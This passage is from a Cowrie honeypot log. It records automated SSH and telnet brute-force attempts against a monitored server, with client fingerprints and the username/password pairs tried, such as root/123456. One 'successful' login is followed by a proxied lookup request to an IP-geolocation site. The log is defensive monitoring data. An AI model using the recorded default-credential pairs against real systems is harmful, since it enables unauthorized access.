om","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:41:55.594185Z","src_ip":"212.227.235.229","session":"07b4ec7cd9d6"}
{"eventid":"cowrie.login.failed","username":"installer","password":"installer","message":"login attempt [installer/installer] failed","sensor":"my-vps","timestamp":"2025-08-31T04:41:57.766955Z","src_ip":"212.227.235.229","session":"07b4ec7cd9d6"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:41:59.024692Z","src_ip":"212.227.235.229","session":"07b4ec7cd9d6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37802,"dst_ip":"1.2.3.4","dst_port":22,"session":"f793311c4412","protocol":"ssh","message":"New connection: 212.227.125.160:37802 (1.2.3.4:22) [session: f793311c4412]","sensor":"my-vps","timestamp":"2025-08-31T04:42:00.017633Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:42:00.018654Z","src_ip":"212.227.125.160","session":"f793311c4412"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:42:00.202258Z","src_ip":"212.227.125.160","session":"f793311c4412"}
{"eventid":"cowrie.login.failed","username":"sonar","password":"123456","message":"login attempt [sonar/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T04:42:00.753861Z","src_ip":"212.227.125.160","session":"f793311c4412"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin123","message":"login attempt [admin/admin123] failed","sensor":"my-vps","timestamp":"2025-08-31T04:42:01.819265Z","src_ip":"212.227.235.229","session":"b14dad5641cf"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:42:01.939971Z","src_ip":"212.227.125.160","session":"f793311c4412"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44330,"dst_ip":"1.2.3.4","dst_port":22,"session":"12b7cd0f4bf5","protocol":"ssh","message":"New connection: 212.227.235.229:44330 (1.2.3.4:22) [session: 12b7cd0f4bf5]","sensor":"my-vps","timestamp":"2025-08-31T04:42:04.732371Z"}
{"eventid":"cowrie.session.closed","duration":"15.7","message":"Connection lost after 15.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:42:04.937158Z","src_ip":"212.227.235.229","session":"b14dad5641cf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37848,"dst_ip":"1.2.3.4","dst_port":22,"session":"cec45e2a7afe","protocol":"ssh","message":"New connection: 212.227.125.160:37848 (1.2.3.4:22) [session: cec45e2a7afe]","sensor":"my-vps","timestamp":"2025-08-31T04:42:05.319976Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:42:05.320948Z","src_ip":"212.227.125.160","session":"cec45e2a7afe"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:42:05.398629Z","src_ip":"212.227.235.229","session":"12b7cd0f4bf5"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T04:42:05.399439Z","src_ip":"212.227.235.229","session":"12b7cd0f4bf5"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:42:05.509248Z","src_ip":"212.227.125.160","session":"cec45e2a7afe"}
{"eventid":"cowrie.login.failed","username":"jumpserver","password":"jumpserver","message":"login attempt [jumpserver/jumpserver] failed","sensor":"my-vps","timestamp":"2025-08-31T04:42:06.076683Z","src_ip":"212.227.125.160","session":"cec45e2a7afe"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52393,"dst_ip":"1.2.3.4","dst_port":23,"session":"2caa0588affa","protocol":"telnet","message":"New connection: 212.227.125.160:52393 (1.2.3.4:23) [session: 2caa0588affa]","sensor":"my-vps","timestamp":"2025-08-31T04:42:06.669218Z"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:42:07.267786Z","src_ip":"212.227.125.160","session":"cec45e2a7afe"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56828,"dst_ip":"1.2.3.4","dst_port":22,"session":"76172e19d8be","protocol":"ssh","message":"New connection: 212.227.125.160:56828 (1.2.3.4:22) [session: 76172e19d8be]","sensor":"my-vps","timestamp":"2025-08-31T04:42:09.954654Z"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"12345678","message":"login attempt [postgres/12345678] failed","sensor":"my-vps","timestamp":"2025-08-31T04:42:11.334399Z","src_ip":"212.227.235.229","session":"12b7cd0f4bf5"}
{"eventid":"cowrie.session.closed","duration":"8.5","message":"Connection lost after 8.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:42:13.202938Z","src_ip":"212.227.235.229","session":"12b7cd0f4bf5"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:42:13.341297Z","src_ip":"212.227.125.160","session":"76172e19d8be"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:42:13.342296Z","src_ip":"212.227.125.160","session":"76172e19d8be"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33710,"dst_ip":"1.2.3.4","dst_port":22,"session":"4c75c57c4742","protocol":"ssh","message":"New connection: 212.227.235.229:33710 (1.2.3.4:22) [session: 4c75c57c4742]","sensor":"my-vps","timestamp":"2025-08-31T04:42:15.729832Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:42:15.732336Z","src_ip":"212.227.235.229","session":"4c75c57c4742"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52488,"dst_ip":"1.2.3.4","dst_port":22,"session":"7182efeff58e","protocol":"ssh","message":"New connection: 212.227.125.160:52488 (1.2.3.4:22) [session: 7182efeff58e]","sensor":"my-vps","timestamp":"2025-08-31T04:42:15.886996Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:42:15.887893Z","src_ip":"212.227.125.160","session":"7182efeff58e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:42:16.075691Z","src_ip":"212.227.125.160","session":"7182efeff58e"}
{"eventid":"cowrie.login.failed","username":"root","password":"123456","message":"login attempt [root/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T04:42:16.640447Z","src_ip":"212.227.125.160","session":"7182efeff58e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33724,"dst_ip":"1.2.3.4","dst_port":22,"session":"85309a2a8b59","protocol":"ssh","message":"New connection: 212.227.235.229:33724 (1.2.3.4:22) [session: 85309a2a8b59]","sensor":"my-vps","timestamp":"2025-08-31T04:42:17.045752Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:42:17.191518Z","src_ip":"212.227.235.229","session":"85309a2a8b59"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:42:17.320046Z","src_ip":"212.227.235.229","session":"85309a2a8b59"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:42:17.829160Z","src_ip":"212.227.125.160","session":"7182efeff58e"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:42:19.426857Z","src_ip":"212.227.235.229","session":"4c75c57c4742"}
{"eventid":"cowrie.login.success","username":"root","password":"root123","message":"login attempt [root/root123] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:42:22.094304Z","src_ip":"212.227.235.229","session":"4c75c57c4742"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"ip-who.com","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to ip-who.com:80 from :0","sensor":"my-vps","timestamp":"2025-08-31T04:42:23.023223Z","session":"4c75c57c4742"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"ip-who.com","dst_port":80,"data":"b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to ip-who.com:80 with data b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T04:42:23.516988Z","src_ip":"212.227.235.229","session":"4c75c57c4742"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51320,"dst_ip":"1.2.3.4","dst_port":22,"session":"ce2fb3d53704","protocol":"ssh","message":"New connection: 212.227.235.229:51320 (1.2.3.4:22) [session: ce2fb3d53704]","sensor":"my-vps","timestamp":"2025-08-31T04:42:24.662287Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43118,"dst_ip":"1.2.3.4","dst_port":22,"session":"d80ef083106a","protocol":"ssh","message":"New connection: 212.227.235.229:43118 (1.2.3.4:22) [session: d80ef083106a]","sensor":"my-vps","timestamp":"2025-08-31T04:42:24.808482Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:42:24.829716Z","src_ip":"212.227.235.229","session":"ce2fb3d53704"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellm